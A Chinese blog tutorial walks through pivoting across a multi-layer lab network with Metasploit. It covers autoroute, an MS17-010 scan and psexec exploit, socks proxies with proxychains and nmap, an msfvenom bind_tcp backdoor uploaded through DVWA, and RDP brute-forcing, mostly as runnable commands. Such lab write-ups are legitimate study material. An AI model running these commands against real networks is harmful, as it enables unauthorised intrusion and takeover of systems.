• 使用msf入侵多层级网络架构


    假设,有一个多层网络环境结构,每层靶机只与相邻服务器互通,那么,如何从Hack的笔记本去获取Server5(10.0.3.2)的系统权限呢?



    首先,我们通过Web入侵获得Server1权限,并通过横向渗透到Server2,探测到Server2存在双网卡。在这里,我们以Server2作为攻击跳板机继续入侵。

    第1层靶机→第2靶机
    1、获取内网网段信息

    meterpreter > run get_local_subnets
    [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
    [!] Example: run post/multi/manage/autoroute OPTION=value [...]
    Local subnet: 10.0.0.0/255.255.255.0
    Local subnet: 10.0.1.0/255.255.255.0
    


    通过内网本地路由查询,可以获悉内网网段地址为:10.0.1.0/24。
    2、添加去往第二层内网网段(10.0.1.0/24)的静态路由。

    meterpreter > run autoroute -s 10.0.1.0/24
    [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
    [!] Example: run post/multi/manage/autoroute OPTION=value [...]
    [*] Adding a route to 10.0.1.0/255.255.255.0...
    [+] Added route to 10.0.1.0/255.255.255.0 via 10.0.0.3
    [*] Use the -p option to list all active routes
    


    3、扫描内网主机,使用msf下的扫描模块对IP段进行扫描看是否存来MS17-010漏洞。

    use auxiliary/scanner/smb/smb_ms17_010 
    show options
    set rhosts 10.0.1.0/24
    set threads 50
    run
    

    通过扫描发现10.0.1.2存在MS-17010漏洞。
    4、通过MS-17010漏洞获取Server3的系统权限。

     use exploit/windows/smb/ms17_010_psexec
     set rhost 10.0.1.2
     set payload windows/meterpreter/bind_tcp
     run
    

    成功获取第二层靶机权限,查看ip地址,发现第三个网段。


    第2层靶机→第3靶机
    添加第三个网段的静态理由。

    meterpreter > run autoroute -s 10.0.2.0/24
    [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
    [!] Example: run post/multi/manage/autoroute OPTION=value [...]
    [*] Adding a route to 10.0.2.0/255.255.255.0...
    [+] Added route to 10.0.2.0/255.255.255.0 via 10.0.1.2
    [*] Use the -p option to list all active routes
    

    使用MS17-010扫描无果,发现10.0.2.2主机存活,利用msf搭建socks代理

    use auxiliary/server/socks4a
    set srvport 9999
    run
    


    在攻击机Kali中,修改配置文件/etc/proxychains.conf

    socks4 10.0.0.2 9999
    

    使用proxychains 对第三层靶机进行端口扫描:

    proxychains nmap -Pn -sT 10.0.2.2 -p1-1000
    

    在Firefox中设置socks代理。



    本地就可以直接访问到第三层靶机,在DVWA中,通过任意文件上传msf后门,获取站点权限。



    利用msfvenom生成木马后门:

    msfvenom -p windows/meterpreter/bind_tcp LPORT=8888 -f exe > shell.exe
    
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/bind_tcp
    set RHOST 10.0.2.2
    set LPORT 8888
    set ExitOnSession false
    exploit -j -z
    

    在webshell中,上传并成功执行shell.exe,成功返回Server4的权限。


    第3层靶机→第4靶机
    添加第四个网段的静态理由。

    meterpreter > run autoroute -s 10.0.3.0/24
    [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
    [!] Example: run post/multi/manage/autoroute OPTION=value [...]
    [*] Adding a route to 10.0.3.0/255.255.255.0...
    [+] Added route to 10.0.3.0/255.255.255.0 via 10.0.2.2
    [*] Use the -p option to list all active routes
    

    开启socker

    use auxiliary/server/socks4a
    set srvport 6666
    run
    

    探测第四个网段存活的主机,发现10.0.3.2 开放了3389端口。

    proxychains nmap -Pn -sT 10.0.3.0/24 -p22,80,3389
    

    将第四层目标主机的3389流量转发到代理服务器中:



    在本地对RDP账号密码进行爆破:



    爆破成功后,使用账号密码成功登录服务器。


  • 相关阅读:
    [Camtasia报错]An error occurred in the Recorde System Audio setup Failed
    [Oracle报错]RMAN-12005: error during channel cleanup/ORA-19550: cannot ...
    [Teamviewer报错]现在无法捕捉屏幕画面。这可能是由于快速的...
    [SVN技能]SVN服务迁移(Windows-Linux)
    [RabbitMQ技能]安装部署单节点RabbitMQ
    运算符的那些事
    java之连接数据库之JDBC访问数据库的基本操作
    面向对象编程之OC
    集合
    面向对象
  • 原文地址:https://www.cnblogs.com/xiaozi/p/13022622.html
Copyright © 2020-2023  润新知